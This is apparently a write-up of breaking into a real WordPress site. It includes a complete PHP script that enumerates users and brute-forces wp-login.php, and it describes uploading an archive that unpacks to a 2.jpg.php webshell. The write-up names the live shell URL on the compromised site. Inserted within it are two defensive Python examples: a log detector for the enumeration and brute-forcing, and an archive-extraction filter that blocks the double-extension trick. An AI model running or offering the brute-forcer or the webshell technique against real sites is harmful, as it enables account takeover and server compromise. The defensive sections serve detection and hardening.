Writing a webshell when the whole site has permission 5 (the webroot is not writable)
Faced with a website (skipping ten thousand words here), crawl it first.
Using this tool:
I found an info directory suspicious. After opening it, I determined that it was WordPress, based on my years of daily experience, keen observation, and strong analytical skills.
This blogging program has no good vulnerabilities, and the only easy-to-use XSS requires administrator interaction.
So I used the following script:
<?php
// Enumerate WordPress users via /?author=N, then try each username as its own
// password and afterwards a wordlist (pass.txt, one password per line) against wp-login.php.
// Usage: php wpcrack.php http://target.example
set_time_limit(0);
$domain = rtrim($argv[1], '/');
$namearray = array();

// Get the usernames: /?author=N redirects to /author/<name>/, and that page
// carries a link of the form author/<name>/feed.
for ($i = 1; $i <= 10; $i++) {
    $url = $domain . "/?author=" . $i;
    $response = httprequest($url, 0);
    if ($response === 404) {
        continue;
    }
    $pattern = "/author\/(.*?)\/feed/";
    if (preg_match($pattern, $response, $name)) {
        $namearray[] = $name[1];
    }
}
$namearray = array_unique($namearray);
echo "Got " . count($namearray) . " users in total\n";

echo "Cracking users whose password equals their username:\n";
$crackname = crackpassword($namearray, "same");

$passwords = file("pass.txt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
echo "Cracking users with weak passwords:\n";
if ($crackname) {
    // Skip the accounts that were already cracked.
    $namearray = array_diff($namearray, $crackname);
}
crackpassword($namearray, $passwords);

function crackpassword($namearray, $passwords)
{
    global $domain;
    $crackname = array();
    $url = $domain . "/wp-login.php";
    foreach ($namearray as $name) {
        // In "same" mode the only candidate password is the username itself.
        $candidates = ($passwords === "same") ? array($name) : $passwords;
        foreach ($candidates as $pass) {
            // wp-submit=%E7%99%BB%E5%BD%95 is the URL-encoded button label "登录" (Log In).
            $post = "log=" . urlencode($name) . "&pwd=" . urlencode($pass)
                  . "&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=" . urlencode($domain)
                  . "%2Fwp-admin%2F&testcookie=1";
            $body = httprequest($url, $post);
            // A failed login renders <div id="login_error">; its absence means the login went through.
            if ($body !== 404 && strpos($body, 'div id="login_error"') === false) {
                echo ($passwords === "same") ? "$name\n" : "$name $pass\n";
                $crackname[] = $name;
                break; // no need to try further passwords for this user
            }
        }
    }
    return $crackname;
}

function httprequest($url, $post)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    if ($post) {
        curl_setopt($ch, CURLOPT_POST, 1);           // submit via POST
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    }
    $output = curl_exec($ch);
    $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    if ($httpcode == 404) {
        return 404;
    }
    return $output;
}
?>
It fetches the users directly and then tries each username as its own password.
Nice, the account has administrator privileges.
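The two steps above leave a distinctive trace in the web server's access log. The following Python script is an added example, not part of the original write-up: it parses constructed combined-format log lines and flags a client that sweeps ?author=N and then fires a burst of POSTs at wp-login.php, treating a 302 among the POST responses as a probable successful login (WordPress redirects on success and re-renders the form with HTTP 200 on failure). The sample log lines, IP addresses, thresholds and window size are assumptions made for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample access log (combined log format); not from the original page.
# 203.0.113.7 sweeps ?author=1..4, then POSTs wp-login.php six times; the last
# POST gets a 302, which is how WordPress answers a successful login (failed
# logins re-render the form with 200). 198.51.100.9 is an ordinary visitor.
SAMPLE_LOG = """\
203.0.113.7 - - [12/May/2015:10:00:01 +0800] "GET /info/?author=1 HTTP/1.1" 301 0 "-" "curl/7.38"
203.0.113.7 - - [12/May/2015:10:00:01 +0800] "GET /info/author/admin/ HTTP/1.1" 200 8123 "-" "curl/7.38"
203.0.113.7 - - [12/May/2015:10:00:02 +0800] "GET /info/?author=2 HTTP/1.1" 301 0 "-" "curl/7.38"
203.0.113.7 - - [12/May/2015:10:00:02 +0800] "GET /info/author/editor/ HTTP/1.1" 200 7990 "-" "curl/7.38"
203.0.113.7 - - [12/May/2015:10:00:03 +0800] "GET /info/?author=3 HTTP/1.1" 404 1201 "-" "curl/7.38"
203.0.113.7 - - [12/May/2015:10:00:03 +0800] "GET /info/?author=4 HTTP/1.1" 404 1201 "-" "curl/7.38"
198.51.100.9 - - [12/May/2015:10:00:05 +0800] "GET /info/2015/05/hello-world/ HTTP/1.1" 200 9011 "-" "Mozilla/5.0"
203.0.113.7 - - [12/May/2015:10:00:06 +0800] "POST /info/wp-login.php HTTP/1.1" 200 3220 "-" "curl/7.38"
203.0.113.7 - - [12/May/2015:10:00:06 +0800] "POST /info/wp-login.php HTTP/1.1" 200 3220 "-" "curl/7.38"
203.0.113.7 - - [12/May/2015:10:00:07 +0800] "POST /info/wp-login.php HTTP/1.1" 200 3220 "-" "curl/7.38"
203.0.113.7 - - [12/May/2015:10:00:07 +0800] "POST /info/wp-login.php HTTP/1.1" 200 3220 "-" "curl/7.38"
203.0.113.7 - - [12/May/2015:10:00:08 +0800] "POST /info/wp-login.php HTTP/1.1" 200 3220 "-" "curl/7.38"
203.0.113.7 - - [12/May/2015:10:00:08 +0800] "POST /info/wp-login.php HTTP/1.1" 302 0 "-" "curl/7.38"
198.51.100.9 - - [12/May/2015:10:01:30 +0800] "POST /info/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) '
)
AUTHOR_RE = re.compile(r'[?&]author=(\d+)')


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group('ts'), '%d/%b/%Y:%H:%M:%S %z')
    return {'ip': m.group('ip'), 'ts': ts, 'method': m.group('method'),
            'path': m.group('path'), 'status': int(m.group('status'))}


def max_in_window(stamped, window_seconds):
    """Largest number of (timestamp, status) events inside any window_seconds-wide window."""
    best = start = 0
    for end in range(len(stamped)):
        while (stamped[end][0] - stamped[start][0]).total_seconds() > window_seconds:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect(log_text, window_seconds=60, author_threshold=3, login_threshold=5):
    """Return {ip: findings} for clients that enumerate authors or brute-force wp-login.php."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    events.sort(key=lambda e: e['ts'])  # stable sort keeps file order for equal timestamps
    by_ip = defaultdict(lambda: {'author_ids': set(), 'logins': []})
    for e in events:
        rec = by_ip[e['ip']]
        m = AUTHOR_RE.search(e['path'])
        if e['method'] == 'GET' and m:
            rec['author_ids'].add(int(m.group(1)))          # 404s count: the probe was made
        if e['method'] == 'POST' and e['path'].split('?')[0].endswith('wp-login.php'):
            rec['logins'].append((e['ts'], e['status']))
    findings = {}
    for ip, rec in by_ip.items():
        f = {}
        if len(rec['author_ids']) >= author_threshold:
            f['author_enum'] = sorted(rec['author_ids'])
        burst = max_in_window(rec['logins'], window_seconds)
        if burst >= login_threshold:
            f['login_attempts'] = burst
            # A 302 from a client that was hammering the form means a credential worked.
            f['login_success'] = any(status == 302 for _, status in rec['logins'])
        if f:
            findings[ip] = f
    return findings


if __name__ == '__main__':
    for ip, f in detect(SAMPLE_LOG).items():
        print(ip, f)
```

Run against a real log, the same function takes the file contents in place of SAMPLE_LOG; the single ordinary-visitor POST that also returns 302 is not flagged because it never crosses the login threshold, which is the point of counting bursts per client rather than alerting on every successful login.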
Do you think this is the end?
Haha, the whole site is not writable.
Next I found this and put it to work: upload.
2.jpg.php is the webshell.
OK, the upload is automatically decompressed, giving this address:
Https://www.bkjia.com//info/wp-content/uploads/2015/05/2.jpg.php
Getshell achieved.
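What made the last step work is that the upload feature unpacked an archive into wp-content/uploads (the one directory that stays writable on a mode-5 site) without checking the names inside it, so 2.jpg.php landed in a path the server executes PHP from. The following Python code is an added example, not the page's or WordPress's code: an extraction filter that rejects any archive entry with an executable suffix anywhere in its dotted name (2.jpg.php as well as shell.php.jpg), entries that escape the destination directory (zip-slip), and server-config overrides such as .htaccess, and writes out the rest. The archive contents, the extension lists and the destination directory are constructed for the demo.

```python
import io
import os
import posixpath
import tempfile
import zipfile

# Suffixes the web server may hand to an interpreter. An entry is rejected if ANY
# of its dotted suffixes is one of these, so 2.jpg.php and shell.php.jpg both fail.
EXECUTABLE_EXTS = {'php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'phar', 'pht',
                   'shtml', 'cgi', 'pl', 'jsp', 'asp', 'aspx'}
# The final extension must be on this allow-list (assumed list for the demo).
ALLOWED_EXTS = {'jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt'}
# Server-config overrides that could re-enable PHP inside the uploads tree.
CONFIG_NAMES = {'.htaccess', '.user.ini', 'web.config'}


def check_entry(name):
    """Return (True, '') if the archive entry may be written, else (False, reason)."""
    if not name:
        return False, 'empty name'
    parts_path = posixpath.normpath(name.replace('\\', '/')).split('/')
    if name.startswith('/') or '..' in parts_path:
        return False, 'path escapes destination (zip-slip)'
    base = parts_path[-1]
    if base.lower() in CONFIG_NAMES:
        return False, 'server configuration override'
    parts = base.lower().split('.')
    if len(parts) < 2 or parts[0] == '':
        return False, 'no usable extension'
    bad = EXECUTABLE_EXTS.intersection(parts[1:])
    if bad:
        return False, 'executable extension in name: ' + ','.join(sorted(bad))
    if parts[-1] not in ALLOWED_EXTS:
        return False, 'extension not allowed: ' + parts[-1]
    return True, ''


def safe_extract(zip_bytes, dest_dir):
    """Extract only entries that pass check_entry. Returns (written, rejected)."""
    written, rejected = [], []
    dest_root = os.path.realpath(dest_dir)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue  # directories are created as needed for accepted files
            ok, reason = check_entry(info.filename)
            if not ok:
                rejected.append((info.filename, reason))
                continue
            rel = posixpath.normpath(info.filename).split('/')
            target = os.path.realpath(os.path.join(dest_root, *rel))
            # Belt and braces: the resolved path must still sit under dest_root.
            if os.path.commonpath([dest_root, target]) != dest_root:
                rejected.append((info.filename, 'resolved outside destination'))
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, 'wb') as dst:
                dst.write(src.read())
            written.append(info.filename)
    return written, rejected


def build_demo_zip():
    """Constructed archive standing in for the uploaded file: one real image name,
    one double-extension webshell name, one zip-slip name and one .htaccess."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as zf:
        zf.writestr('2015/05/photo.jpg', b'\xff\xd8\xff\xe0 (placeholder image bytes)')
        zf.writestr('2015/05/2.jpg.php', b'<?php /* webshell body omitted */ ?>')
        zf.writestr('../../wp-config.php', b'<?php /* would overwrite the site config */')
        zf.writestr('2015/05/.htaccess', b'AddType application/x-httpd-php .jpg')
    return buf.getvalue()


def demo():
    """Extract the demo archive into a throwaway directory and return (written, rejected)."""
    with tempfile.TemporaryDirectory() as d:
        return safe_extract(build_demo_zip(), d)


if __name__ == '__main__':
    written, rejected = demo()
    print('written :', written)
    for name, reason in rejected:
        print('rejected:', name, '->', reason)
```

Name checks are only half of the fix: the uploads directory should also have PHP execution disabled at the server level (no PHP handler for wp-content/uploads), so that a bypass of the filter still does not yield a shell.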